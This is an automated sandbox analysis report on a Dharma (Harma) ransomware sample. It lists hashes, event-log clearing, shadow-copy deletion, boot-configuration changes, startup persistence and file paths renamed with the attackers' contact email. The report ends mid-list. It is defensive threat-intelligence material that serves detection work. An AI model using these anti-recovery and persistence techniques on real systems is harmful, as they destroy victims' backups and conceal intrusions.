Analysis
-
max time kernel
110s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
08-05-2023 17:48
Static task
static1
Behavioral task
behavioral1
Sample
VirusShare_5c36e305d926e55ef98d392176890cd2.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
VirusShare_5c36e305d926e55ef98d392176890cd2.exe
Resource
win10v2004-20230220-en
General
-
Target
VirusShare_5c36e305d926e55ef98d392176890cd2.exe
-
Size
1.0MB
-
MD5
5c36e305d926e55ef98d392176890cd2
-
SHA1
64a15cdf89b6c8b85cba355b6944074614d810fd
-
SHA256
5671112c276673ee5c4630994ac0034927cee2aa05a32ca6950edbc80c56e7e8
-
SHA512
082855fadbe445ab1f582bb7773276c08bded82ecd00ae1651b620aa12e97315d01acea3cfbe99c504d6d74ce1cff471a4993ff8ebb93416df787cefa88baf1b
-
SSDEEP
24576:EoZZV7Uqi5inyhZQDkUzVDZJ2vH53GaJR38:HOqigyDQDZVq52wM
Malware Config
Signatures
-
Dharma
Dharma is a ransomware that uses security software installation to hide malicious activities.
-
Clears Windows event logs 1 TTPs 64 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exepid process 288 wevtutil.exe 4936 wevtutil.exe 4648 wevtutil.exe 3528 wevtutil.exe 4816 wevtutil.exe 4648 wevtutil.exe 1552 wevtutil.exe 292 wevtutil.exe 3632 wevtutil.exe 4524 wevtutil.exe 2828 wevtutil.exe 3824 wevtutil.exe 1412 wevtutil.exe 4796 wevtutil.exe 2868 wevtutil.exe 1552 wevtutil.exe 392 wevtutil.exe 2752 wevtutil.exe 3940 wevtutil.exe 1248 wevtutil.exe 2808 wevtutil.exe 4492 wevtutil.exe 4444 wevtutil.exe 1564 wevtutil.exe 640 wevtutil.exe 4084 wevtutil.exe 4408 wevtutil.exe 1436 wevtutil.exe 2192 wevtutil.exe 3328 wevtutil.exe 4760 wevtutil.exe 2288 wevtutil.exe 4260 wevtutil.exe 780 wevtutil.exe 932 wevtutil.exe 2208 wevtutil.exe 4968 wevtutil.exe 3112 wevtutil.exe 5008 wevtutil.exe 1984 wevtutil.exe 3964 wevtutil.exe 304 wevtutil.exe 1732 wevtutil.exe 4500 wevtutil.exe 1212 wevtutil.exe 3008 wevtutil.exe 3612 wevtutil.exe 3068 wevtutil.exe 272 wevtutil.exe 1080 wevtutil.exe 3700 wevtutil.exe 4776 wevtutil.exe 4444 wevtutil.exe 1008 wevtutil.exe 2116 wevtutil.exe 3568 wevtutil.exe 4648 wevtutil.exe 3576 wevtutil.exe 292 wevtutil.exe 4516 wevtutil.exe 412 wevtutil.exe 2072 wevtutil.exe 3488 wevtutil.exe 3704 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 3936 bcdedit.exe 3656 bcdedit.exe -
Processes:
wbadmin.exepid process 2796 wbadmin.exe -
Disables Task Manager via registry modification
-
Drops startup file 3 IoCs
Processes:
cmd.exeattrib.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe attrib.exe -
Modifies file permissions 1 TTPs 1 IoCs
-
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
VirusShare_5c36e305d926e55ef98d392176890cd2.exedescription ioc process File opened (read-only) \??\G: VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened (read-only) \??\A: VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened (read-only) \??\B: VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened (read-only) \??\Q: VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened (read-only) \??\U: VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened (read-only) \??\X: VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened (read-only) \??\E: VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened (read-only) \??\K: VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened (read-only) \??\M: VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened (read-only) \??\R: VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened (read-only) \??\S: VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened (read-only) \??\Z: VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened (read-only) \??\I: VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened (read-only) \??\J: VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened (read-only) \??\P: VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened (read-only) \??\W: VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened (read-only) \??\Y: VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened (read-only) \??\F: VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened (read-only) \??\H: VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened (read-only) \??\L: VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened (read-only) \??\N: VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened (read-only) \??\O: VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened (read-only) \??\T: VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened (read-only) \??\V: VirusShare_5c36e305d926e55ef98d392176890cd2.exe -
Drops file in Program Files directory 64 IoCs
Processes:
VirusShare_5c36e305d926e55ef98d392176890cd2.exedescription ioc process File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019R_OEM_Perp-ul-phn.xrm-ms.id-033BC821.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\MSOUC.HXS.id-033BC821.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\uk-ua\ui-strings.js.id-033BC821.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\sl-si\ui-strings.js.id-033BC821.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-keyring-impl.xml.id-033BC821.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\AccessVL_KMS_Client-ul.xrm-ms.id-033BC821.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\REFEDIT.DLL.id-033BC821.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\Bibliography\Style\SIST02.XSL.id-033BC821.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\EXPEDITN\EXPEDITN.ELM.id-033BC821.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\compare_poster.jpg.id-033BC821.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\SupplementalDictionaries\en_CA\added.txt.id-033BC821.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\mt.pak.DATA.id-033BC821.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-favorites.xml.id-033BC821.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-tools_ja.jar.id-033BC821.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Professional2019R_OEM_Perp-ul-oob.xrm-ms.id-033BC821.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Publisher2019R_OEM_Perp-pl.xrm-ms.id-033BC821.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\GRPHFLT\MS.PNG.id-033BC821.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\themes\dark\warning.png.id-033BC821.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\sv-se\ui-strings.js.id-033BC821.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa.id-033BC821.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-oql.xml.id-033BC821.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\Fonts\private\DUBAI-LIGHT.TTF.id-033BC821.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\hu_get.svg.id-033BC821.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-core.xml.id-033BC821.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\OneNoteVL_MAK-pl.xrm-ms.id-033BC821.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\GRAPH_COL.HXT.id-033BC821.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\css\main.css.id-033BC821.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\help.svg.id-033BC821.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\progress-indeterminate.gif.id-033BC821.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\en-ae\ui-strings.js.id-033BC821.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-openide-text.xml.id-033BC821.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files\Microsoft Office\root\Templates\1033\ClassicPhotoAlbum.potx.id-033BC821.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\sk-sk\ui-strings.js.id-033BC821.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\selector.js.id-033BC821.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019MSDNR_Retail-ul-oob.xrm-ms.id-033BC821.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PDFREFLOW.EXE.id-033BC821.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\WordR_Retail-ppd.xrm-ms.id-033BC821.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\css\faf-main.css.id-033BC821.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\x.cur.id-033BC821.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-io_zh_CN.jar.id-033BC821.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStd2019R_Retail-ul-phn.xrm-ms.id-033BC821.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\1033\MSOINTL.DLL.id-033BC821.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\illustrations_retina.png.id-033BC821.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\ml.pak.id-033BC821.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PowerPointVL_MAK-ppd.xrm-ms.id-033BC821.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml.id-033BC821.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectProR_Retail-ul-phn.xrm-ms.id-033BC821.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN054.XML.id-033BC821.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_filter-down_32.svg.id-033BC821.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\nub.png.id-033BC821.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\illustrations.png.id-033BC821.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\pt-br\ui-strings.js.id-033BC821.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeStudentR_Trial2-ul-oob.xrm-ms.id-033BC821.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Professional2019R_Retail-pl.xrm-ms.id-033BC821.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\OMML2MML.XSL.id-033BC821.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\images\avatar.jpg.id-033BC821.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\themes\dark\s_radio_selected_18.svg.id-033BC821.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pl_get.svg.id-033BC821.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\TRANSLAT\FREN\MSB1FREN.DLL.id-033BC821.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\fr-fr\ui-strings.js.id-033BC821.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremDemoR_BypassTrial365-ul-oob.xrm-ms.id-033BC821.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL083.XML.id-033BC821.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\back-arrow-focus.svg.id-033BC821.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\CompleteCheckmark2x.png.id-033BC821.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe -
Drops file in Windows directory 4 IoCs
Processes:
VirusShare_5c36e305d926e55ef98d392176890cd2.exewbadmin.exedescription ioc process File created C:\Windows\HRMPRIV VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.3.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.2.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.1.etl wbadmin.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exepid process 4696 sc.exe 5052 sc.exe 1528 sc.exe 4756 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 1796 schtasks.exe 232 schtasks.exe 1052 schtasks.exe 4408 schtasks.exe -
Interacts with shadow copies 2 TTPs 15 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exepid process 3992 vssadmin.exe 4460 vssadmin.exe 2568 vssadmin.exe 4136 vssadmin.exe 4604 vssadmin.exe 1412 vssadmin.exe 3524 vssadmin.exe 3372 vssadmin.exe 1660 vssadmin.exe 4772 vssadmin.exe 3576 vssadmin.exe 3936 vssadmin.exe 4256 vssadmin.exe 1068 vssadmin.exe 2864 vssadmin.exe -
Kills process with taskkill 5 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 2648 taskkill.exe 2744 taskkill.exe 4756 taskkill.exe 3016 taskkill.exe 5100 taskkill.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
VirusShare_5c36e305d926e55ef98d392176890cd2.exepid process 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 3448 VirusShare_5c36e305d926e55ef98d392176890cd2.exe -
Suspicious use of AdjustPrivilegeToken 48 IoCs
Processes:
taskkill.exetaskkill.exewevtutil.exevssvc.exewevtutil.exedescription pid process Token: SeDebugPrivilege 2744 taskkill.exe Token: SeDebugPrivilege 4756 taskkill.exe Token: SeIncreaseQuotaPrivilege 4580 wevtutil.exe Token: SeSecurityPrivilege 4580 wevtutil.exe Token: SeTakeOwnershipPrivilege 4580 wevtutil.exe Token: SeLoadDriverPrivilege 4580 wevtutil.exe Token: SeSystemProfilePrivilege 4580 wevtutil.exe Token: SeSystemtimePrivilege 4580 wevtutil.exe Token: SeProfSingleProcessPrivilege 4580 wevtutil.exe Token: SeIncBasePriorityPrivilege 4580 wevtutil.exe Token: SeCreatePagefilePrivilege 4580 wevtutil.exe Token: SeBackupPrivilege 4580 wevtutil.exe Token: SeRestorePrivilege 4580 wevtutil.exe Token: SeShutdownPrivilege 4580 wevtutil.exe Token: SeDebugPrivilege 4580 wevtutil.exe Token: SeSystemEnvironmentPrivilege 4580 wevtutil.exe Token: SeRemoteShutdownPrivilege 4580 wevtutil.exe Token: SeUndockPrivilege 4580 wevtutil.exe Token: SeManageVolumePrivilege 4580 wevtutil.exe Token: 33 4580 wevtutil.exe Token: 34 4580 wevtutil.exe Token: 35 4580 wevtutil.exe Token: 36 4580 wevtutil.exe Token: SeBackupPrivilege 4152 vssvc.exe Token: SeRestorePrivilege 4152 vssvc.exe Token: SeAuditPrivilege 4152 vssvc.exe Token: SeIncreaseQuotaPrivilege 4580 wevtutil.exe Token: SeSecurityPrivilege 4580 wevtutil.exe Token: SeTakeOwnershipPrivilege 4580 wevtutil.exe Token: SeLoadDriverPrivilege 4580 wevtutil.exe Token: SeSystemProfilePrivilege 4580 wevtutil.exe Token: SeSystemtimePrivilege 4580 wevtutil.exe Token: SeProfSingleProcessPrivilege 4580 wevtutil.exe Token: 